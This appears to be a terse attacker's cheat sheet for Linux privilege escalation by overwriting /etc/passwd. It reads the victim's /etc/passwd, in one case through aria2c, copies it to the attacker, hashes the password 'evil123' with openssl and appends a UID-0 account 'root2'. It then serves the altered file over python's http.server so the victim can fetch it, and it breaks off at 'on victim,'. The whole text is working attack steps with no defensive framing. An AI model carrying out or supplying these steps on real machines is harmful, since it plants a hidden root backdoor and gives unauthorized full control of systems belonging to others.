- on victim, cat /etc/passwd
- also aria2c can be used if /etc/passwd is restricted ./aria2c -i /etc/passwd
- on attacker , nano newpasswd , paste all content of /etc/passwd
- on victim, Generate password hash
openssl passwd evil123
- echo "root2:<passwd-hash>:0:0:root:/root:/bin/bash" >> newpasswd
- python3 -m http.server 80
- on victim,